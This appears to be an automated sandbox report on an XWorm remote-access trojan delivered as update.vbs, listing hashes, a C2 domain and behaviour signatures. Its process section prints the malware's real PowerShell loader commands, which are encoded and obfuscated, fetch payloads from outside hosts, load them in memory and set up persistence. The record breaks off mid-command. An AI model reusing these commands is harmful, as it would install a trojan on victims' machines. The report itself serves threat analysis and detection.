xworm | f0e5b0472df1921c5b9c32c0dc4c1a3a2cc15084b72df00fe2710f63221ee224

Analysis

max time kernel
147s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
16-03-2024 03:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

update.vbs
Size

35KB
MD5

dae93d3eddca85b787392d52c5a6fc75
SHA1

0910dde04380ab5a7331476b27a33789aac76524
SHA256

96f6c7e573af91ae336eddf40d48ded90ff4df69e510791b715f6941fd795b8b
SHA512

3d6a4e360710247a9c9a16bbc450984341426eff7b51f433ce640f4be32ef893eaf093316124b675e73a2840523314c0f7e7aed8725867e3b1d80f54c73d4aa0
SSDEEP

192:96EQ6mlKX/DZp2ZSh0RuzX+yvpKkKWKQ5DcYUvhAqkw4KBK428rKp9KZKySB3Kj7:24/XrvkBD0kJdc4fWpw0fB4

Score

10^/10

xworm persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

3.1

jdokds.duckdns.org:8895

Mutex

fR94ukDUyBXXff7e

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral14/memory/4288-43-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

20 2592 powershell.exe
38 2592 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation WScript.exe

flow	pid	process
20	2592	powershell.exe
38	2592	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\Name_File.vbs"	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewab.exepowershell.exewab.exewab.exepowershell.exewab.exewab.exewab.exe

pid	process
4112	powershell.exe
4092	powershell.exe
5324	powershell.exe
5408	powershell.exe
3472	powershell.exe
2468	powershell.exe
208	powershell.exe
5204	wab.exe
4024	powershell.exe
3700	wab.exe
1396	wab.exe
3900	powershell.exe
1552	wab.exe
5984	wab.exe
4320	wab.exe

Suspicious use of SetThreadContext 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exewab.exepowershell.exe

description	pid	process	target process
PID 2592 set thread context of 4288	2592	powershell.exe	AddInProcess32.exe
PID 4112 set thread context of 5204	4112	powershell.exe	wab.exe
PID 4092 set thread context of 1396	4092	powershell.exe	wab.exe
PID 5324 set thread context of 3700	5324	powershell.exe	wab.exe
PID 5408 set thread context of 1552	5408	powershell.exe	wab.exe
PID 1396 set thread context of 5984	1396	wab.exe	wab.exe
PID 3472 set thread context of 4320	3472	powershell.exe	wab.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

2136 5000 WerFault.exe powershell.exe
5508 5284 WerFault.exe powershell.exe
5956 5452 WerFault.exe powershell.exe

pid	pid_target	process	target process
2136	5000	WerFault.exe	powershell.exe
5508	5284	WerFault.exe	powershell.exe
5956	5452	WerFault.exe	powershell.exe

Suspicious behavior: EnumeratesProcesses 48 IoCs

Processes:

powershell.exepowershell.exepowershell.exeAddInProcess32.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3244	powershell.exe
3244	powershell.exe
2592	powershell.exe
2592	powershell.exe
4980	powershell.exe
4980	powershell.exe
4980	powershell.exe
2592	powershell.exe
2592	powershell.exe
4288	AddInProcess32.exe
4288	AddInProcess32.exe
4024	powershell.exe
4024	powershell.exe
3900	powershell.exe
3900	powershell.exe
4024	powershell.exe
3900	powershell.exe
3900	powershell.exe
5000	powershell.exe
5000	powershell.exe
4112	powershell.exe
4112	powershell.exe
208	powershell.exe
208	powershell.exe
4112	powershell.exe
5000	powershell.exe
2468	powershell.exe
2468	powershell.exe
4092	powershell.exe
4092	powershell.exe
208	powershell.exe
3472	powershell.exe
3472	powershell.exe
2468	powershell.exe
5284	powershell.exe
5284	powershell.exe
5324	powershell.exe
5324	powershell.exe
5408	powershell.exe
5408	powershell.exe
5452	powershell.exe
5452	powershell.exe
4092	powershell.exe
3472	powershell.exe
5284	powershell.exe
5408	powershell.exe
5324	powershell.exe
5452	powershell.exe

Suspicious behavior: MapViewOfSection 57 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exewab.exepowershell.exe

pid	process
4112	powershell.exe
4092	powershell.exe
5324	powershell.exe
5408	powershell.exe
1396	wab.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	3244	powershell.exe
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeDebugPrivilege	4980	powershell.exe
Token: SeDebugPrivilege	4288	AddInProcess32.exe
Token: SeDebugPrivilege	3900	powershell.exe
Token: SeDebugPrivilege	4024	powershell.exe
Token: SeDebugPrivilege	5000	powershell.exe
Token: SeDebugPrivilege	4112	powershell.exe
Token: SeDebugPrivilege	208	powershell.exe
Token: SeDebugPrivilege	2468	powershell.exe
Token: SeDebugPrivilege	4092	powershell.exe
Token: SeDebugPrivilege	3472	powershell.exe
Token: SeDebugPrivilege	5284	powershell.exe
Token: SeDebugPrivilege	5324	powershell.exe
Token: SeDebugPrivilege	5408	powershell.exe
Token: SeDebugPrivilege	5452	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

AddInProcess32.exe

pid process

4288 AddInProcess32.exe

pid	process
4288	AddInProcess32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exepowershell.exeAddInProcess32.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2040 wrote to memory of 3244	2040	WScript.exe	powershell.exe
PID 2040 wrote to memory of 3244	2040	WScript.exe	powershell.exe
PID 3244 wrote to memory of 2592	3244	powershell.exe	powershell.exe
PID 3244 wrote to memory of 2592	3244	powershell.exe	powershell.exe
PID 2592 wrote to memory of 4980	2592	powershell.exe	powershell.exe
PID 2592 wrote to memory of 4980	2592	powershell.exe	powershell.exe
PID 2592 wrote to memory of 2092	2592	powershell.exe	AddInProcess32.exe
PID 2592 wrote to memory of 2092	2592	powershell.exe	AddInProcess32.exe
PID 2592 wrote to memory of 2092	2592	powershell.exe	AddInProcess32.exe
PID 2592 wrote to memory of 4288	2592	powershell.exe	AddInProcess32.exe
PID 2592 wrote to memory of 4288	2592	powershell.exe	AddInProcess32.exe
PID 2592 wrote to memory of 4288	2592	powershell.exe	AddInProcess32.exe
PID 2592 wrote to memory of 4288	2592	powershell.exe	AddInProcess32.exe
PID 2592 wrote to memory of 4288	2592	powershell.exe	AddInProcess32.exe
PID 2592 wrote to memory of 4288	2592	powershell.exe	AddInProcess32.exe
PID 2592 wrote to memory of 4288	2592	powershell.exe	AddInProcess32.exe
PID 2592 wrote to memory of 4288	2592	powershell.exe	AddInProcess32.exe
PID 4288 wrote to memory of 2180	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 2180	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 2180	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 3116	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 3116	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 3116	4288	AddInProcess32.exe	cmd.exe
PID 3116 wrote to memory of 3900	3116	cmd.exe	powershell.exe
PID 3116 wrote to memory of 3900	3116	cmd.exe	powershell.exe
PID 3116 wrote to memory of 3900	3116	cmd.exe	powershell.exe
PID 2180 wrote to memory of 4024	2180	cmd.exe	powershell.exe
PID 2180 wrote to memory of 4024	2180	cmd.exe	powershell.exe
PID 2180 wrote to memory of 4024	2180	cmd.exe	powershell.exe
PID 4288 wrote to memory of 2648	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 2648	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 2648	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 2160	4288	AddInProcess32.exe	Conhost.exe
PID 4288 wrote to memory of 2160	4288	AddInProcess32.exe	Conhost.exe
PID 4288 wrote to memory of 2160	4288	AddInProcess32.exe	Conhost.exe
PID 4288 wrote to memory of 2304	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 2304	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 2304	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 4640	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 4640	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 4640	4288	AddInProcess32.exe	cmd.exe
PID 2160 wrote to memory of 5000	2160	cmd.exe	powershell.exe
PID 2160 wrote to memory of 5000	2160	cmd.exe	powershell.exe
PID 2160 wrote to memory of 5000	2160	cmd.exe	powershell.exe
PID 4288 wrote to memory of 3224	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 3224	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 3224	4288	AddInProcess32.exe	cmd.exe
PID 2648 wrote to memory of 4112	2648	cmd.exe	powershell.exe
PID 2648 wrote to memory of 4112	2648	cmd.exe	powershell.exe
PID 2648 wrote to memory of 4112	2648	cmd.exe	powershell.exe
PID 4288 wrote to memory of 2152	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 2152	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 2152	4288	AddInProcess32.exe	cmd.exe
PID 4640 wrote to memory of 208	4640	cmd.exe	powershell.exe
PID 4640 wrote to memory of 208	4640	cmd.exe	powershell.exe
PID 4640 wrote to memory of 208	4640	cmd.exe	powershell.exe
PID 4288 wrote to memory of 5112	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 5112	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 5112	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 2880	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 2880	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 2880	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 3752	4288	AddInProcess32.exe	cmd.exe
PID 4288 wrote to memory of 3752	4288	AddInProcess32.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\update.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$numa = 'ZgB1AG4AYwB0AGkAbwBuACAARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEARgByAG8AbQBMAGkAbgBrAHMAIAB7ACAAcABhAHIAYQBtACAAKABbAHMAdAByAGkAbgBnAFsAXQBdACQAbABpAG4AawBzACkAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAAPQAgAEAAKAApADsAIAAkAHMAaAB1AGYAZgBsAGUAZABMAGkAbgBrAHMAIAA9ACAAJABsAGkAbgBrAHMAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAAJABsAGkAbgBrAHMALgBMAGUAbgBnAHQAaAA7ACAAZgBvAHIAZQBhAGMAaAAgACgAJABsAGkAbgBrACAAaQBuACAAJABzAGgAdQBmAGYAbABlAGQATABpAG4AawBzACkAIAB7ACAAdAByAHkAIAB7ACAAJABkAG8AdwBuAGwAbwBhAGQAZQBkAEQAYQB0AGEAIAArAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGwAaQBuAGsAKQAgAH0AIABjAGEAdABjAGgAIAB7ACAAYwBvAG4AdABpAG4AdQBlACAAfQAgAH0AOwAgAHIAZQB0AHUAcgBuACAAJABkAG8AdwBuAGwAbwBhAGQAZQBkAEQAYQB0AGEAIAB9ADsAIAAkAGwAaQBuAGsAcwAgAD0AIABAACgAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA3ADUANQAvADkAOQA3AC8AbwByAGkAZwBpAG4AYQBsAC8AbgBlAHcAXwBpAG0AYQBnAGUAXwByAC4AagBwAGcAPwAxADcAMQAwADQAMQAzADkAOQAzACcALAAgACcAaAB0AHQAcABzADoALwAvAHUAcABsAG8AYQBkAGQAZQBpAG0AYQBnAGUAbgBzAC4AYwBvAG0ALgBiAHIALwBpAG0AYQBnAGUAcwAvADAAMAA0AC8ANwA1ADUALwA5ADkANwAvAG8AcgBpAGcAaQBuAGEAbAAvAG4AZQB3AF8AaQBtAGEAZwBlAF8AcgAuAGoAcABnAD8AMQA3ADEAMAA0ADEAMwA5ADkAMwAnACkAOwAgACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIABEAG8AdwBuAGwAbwBhAGQARABhAHQAYQBGAHIAbwBtAEwAaQBuAGsAcwAgACQAbABpAG4AawBzADsAIABpAGYAIAAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACAAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACAAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACAAaQBmACAAKAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAApACAAewAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAgACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdABhAHIAdABJAG4AZABlAHgALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7ACAAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAgACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAgACQAdAB5AHAAZQAgAD0AIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFAAUgBPAEoARQBUAE8AQQBVAFQATwBNAEEAQwBBAE8ALgBWAEIALgBIAG8AbQBlACcAKQA7ACAAJABtAGUAdABoAG8AZAAgAD0AIAAkAHQAeQBwAGUALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgBzAGIAZAB2ADEALwBLAC8AcQBpAC4AZABlAGgAcwBhAGgALQBzAHMAcgBpAC8ALwA6AHMAcAB0AHQAaAAnACAALAAgACcAMQAnACAALAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAJwAgACwAIAAnAE4AYQBtAGUAXwBGAGkAbABlACcALAAnAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzADMAMgAnACwAJwAnACkAKQB9ACAAfQA=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $numa));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/755/997/original/new_image_r.jpg?1710413993', 'https://uploaddeimagens.com.br/images/004/755/997/original/new_image_r.jpg?1710413993'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.sbdv1/K/qi.dehsah-ssri//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','AddInProcess32',''))} }"
3⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2592

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbs
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4980

C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"
4⤵
PID:2092

C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4288

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dbosqb.cmd" "
5⤵
- Suspicious use of WriteProcessMemory
PID:2180

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "++$troldtj;++$troldtj;$troldtj=$troldtj-1;Function ordfattigere ($Blikdaasers){$Chuttie=5;$Chuttie++;For($Blindlandingernes243=5; $Blindlandingernes243 -lt $Blikdaasers.Length-1; $Blindlandingernes243+=$Chuttie){$Strongness = 'substring';$Springals=$Blikdaasers.$Strongness.Invoke($Blindlandingernes243, 1);$Turdes=$Turdes+$Springals}$Turdes;}$Chiropompholyx=ordfattigere 'Mar khAme.itPyroptSk,depChewssMedul:Dissi/Lejek/ yrelkTympaiPreacsVandsa BagtnFremsb elsoeH,acitIn.rahReappacrownk Her .Ne,vecBalanoSi,ulm Omst/Ud rePKonto/FolkePA rsprBengaeImbecaRaciscPsychk Misfn DignoPalinw SlutlNthsteScreedSkt egOveriiFldenn arrog hjer.I.stajSpirop waitb ower ';$Iconomatically=$Chiropompholyx.split([char]62);$Chiropompholyx=$Iconomatically[0];$amnigenia=ordfattigere 'CommeiIm,taeWillyxSpind ';$Dambrikker = ordfattigere 'Margo\Spejls,kalpyAsth,sgurlywCa.dioE herwOxida6Scyph4Vokat\or,hoWTransi,jaskn Stj.dSahido SekawUnscrsTru dPkartooLovhjw Tr.lereconrThru,STrophhSjkleeTerril BlselOplge\De,orvAft,r1Dromm.Supe,0K.ntr\BurespSidehoPortiwTyrane HyperT,uchsAkkomhAfvrge hrislFornul t.ar.KalveeDe.arxcirk.e Qu l ';.($amnigenia) (ordfattigere 'Depon$UdvikI .aper PapyiV serd,ibblo ompacTo,alyO errtArmeneTrlbe= U,al$ IlgneZimminAfsonvUnest: Pai wP nteiSkravnsettldCoopti Retor Hund ') ;.($amnigenia) (ordfattigere 'Stale$HippoD Pblea,nmormSol,nbUnap rDecusiSamstkAxelskAfsene Silir Skin= Hold$GenskIKodekr Dieui Fortdopobao Ser.cUdda,y ,evatBemureBurr,+ S.ll$ProgrDMicroaFrus.m.imoub Taxar ppliiLa,erkCornak alkoeForsir.ndeg ') ;.($amnigenia) (ordfattigere 'K,itt$Slbebs Dotthindvii BracrPasher ,ersiSpagen T algOmsta Demon=Bol.r Sanse( nrev(LucragIndorwChefim,arriiTrave SludgwSammei DeicnOlep 3Hakk,2Ko se_demimpFe.lfrCosmooOgriscTempoeSena,sBaggrsSordi Lanse- AngrFVenti InlacPT,ansrAffilo.taarcOverreIndissThyros MourIStramdHydro=Dyste$.ulet{ LipsPForstICorsaDDefek} ti y)Organ. KonkCEjendoExercm Pl dm arasaSlotsnKom udRstetLLy.thiRudeknVrikke Efar)Benve Rudim-Longws askepFamillKlasbiBonait Str. Tref[PlaticAfrimh,uppeaSi plrSko s]Expla3 umfa4Oua k ');.($amnigenia) (ordfattigere 'Rehng$An.leSL,udetelae,iSen.ulHoldeeIridie,aketmRinncn Pande ConvrEadiinMoneteA,bej ,gent=Bu,kl Fuldk$RadbrsUng.ohInt eiSkov r Diosr F rtiLej,enDobbeg Daar[Fyrre$hempbsInddahTittei Euc,rLipo.rclassi Azonn pidsg Prsi.CoseicPerusoUn,eau Likvn,dmint Fina-proap2E vrk] iceg ');.($amnigenia) (ordfattigere 'Rett.$ eechGDeadwaEn amvannamoStrstt.rigst Ref.eSvarsrdishanInte eDotes=Gullb(Steg T.nporejule.s ,aletUnapp-Hela PCams.aStenftStouth Pote M dvi$enhe.DJunglaHor.umParepbr.caprVederi esukPresukHannieBrachr Tykk)Sco.n Nonde-An.irACustonNonpedPolab De ar(Corkl[SakkeIUndern Postt OomaP urlitSpindrAntag]Luft :aurae:u trasrouleiGypsyzVi seeHalmf ,ille-TaageeBouilqPrale Coel8Nonim)Agast ') ;if ($Gavotterne) {.$Dambrikker $Stileemnerne;} else {;$Ansaa=ordfattigere 'SociiSHypertUnm,ra NeurrB,fagtFalse-VandlBem,griLgplatPaup s SamiTTransr Fanea .ntenSom.esKr.gsf R.imeBetinrSi is Kysen- SrbaSFljteoSygebu Blanr Sat,cDe treAngek Malo$Pe icC MisohRevisiComplr H lfo,eredp,aftlo pprmVentrpConsthUdvaloE iphl,lobiyperifx T kt Besk- MurmDVina,eIndurs,krivtReprsiGir,lnOxysaa LevotCenteiKarbuoSjakbnGaunt Stat$ Ge,vIunlaurDatabiCo.indLeukoo,atroc .osiyHalo.tMorg.e erv ';.($amnigenia) (ordfattigere ',ppor$CycloI.jssorTilfriCal odOutc oQuerccLederybikintCarpeeAutol=Dent.$B.indeTempin,undhvfjort:Ondula Vgk.pIdo,ipLi eddHyl.ea .reetReincaCu,ub ') ;.($amnigenia) (ordfattigere 'P,oviIImpacmKvartp S aio,yperrIrreft Xant-DitzeMFrikvo As.rdsu eruPac.hlPapire ,ewf FrelsBVilmaiSel.ktdissesoxydeT,onearSenioaHygronDiddisCoun,fS,rmfeStetirDusti ') ;$Iridocyte=$Iridocyte+'\Passionful.Gen';while (-not $Flushingly) {.($amnigenia) (ordfattigere 'Teleo$ PolyFDronnlVacuouRi iksV,ndehVels.i ashn robrgPhlebl tapyVr.wi=Ekspe( P.nnTPhot.eBetjesEm.ratCholo-E strP mdenaUddantP nsihTrest Rec.r$N.ncoISloggrRutsciKrnked Ge,moKapitc GnawyBldnitForlaeHm,el)Skaar ') ;.($amnigenia) $Ansaa;.($amnigenia) (ordfattigere ' befoSOveretSylteaUkontr alystRaads-R mitSBonellAabyheTil ieNon,cpSkyla Supe,5Subca ');$Chiropompholyx=$Iconomatically[$Cirkusene++%$Iconomatically.count];}.($amnigenia) (ordfattigere 'Forma$Elef MAnisoaStocknMiljtdUnbashVulkaa In.uf .rantPamfliSlugvgFrumeeKosm, Taskl= umbe AbnorGDer oeHovedtCatac-MilieCFors,o BlehnTertit SkodekolponKalkutEpi,r Impar$InveiINa,err Mto.i,ushedBukkeo Hertc Ur ny.ygmetminc,e Akti ');.($amnigenia) (ordfattigere 'Ak.io$ ,ormCAuto.oOrbieuTndehnRubelt Tidse M grr Noraa heavdMolbovCarp.iMishac IncreTresp Wh t=R.tte garde[Pel,pSAb loyCosm ssup rt SlrueValmum ekli.EksplCFremmoSurann rundv Strae,niverDep at St.r]Bibli:,rkni:GraveFMaldorModa,oKapacm ThroBSkjala .arcs,ndgie kovb6Phth,4SnortSRindetImde rCrossi MetanUdspigMol h(Fes,r$ OutbMVinklaPo pinDesped Kickh voldaK,ncefArbejt NatuiProblg egnee Krig) Fri. ');.($amnigenia) (ordfattigere 'A,ela$Co,abJInroceRingkeHumanpDomineKnippdJungm ,alu=S,ids Overo[K,lymS pusly d,pusR,vestSashaePimplmBack..CollaTSk.ive De,oxSupertTrefa.ForsiE CasunNecescSuperoAgt.rdfait iHelepn Tredg Or h]Vr.is:Hvdin: BrneASmag,S CeleCTrosrI subtIPost,.DikteGTf,eneSmalstMinesSTalectMis.drQuinqiByfesnF,rmagrovdy( Unco$SynodCT lbao ,mpeuDisconprop,t gneere atrKonfea He,tdPodesvEst,riSt.enc Af,re.ssev) Vol, ');.($amnigenia) (ordfattigere 'Preco$ ersrre,eroMycteaDommes EnretSemip=nondi$S,ansJ E vreUimodeBedemp DickeF,lmtdFasci.Verdessc louSpgelbRejsesStriktJac.frShafti His,nAr cogTankl( 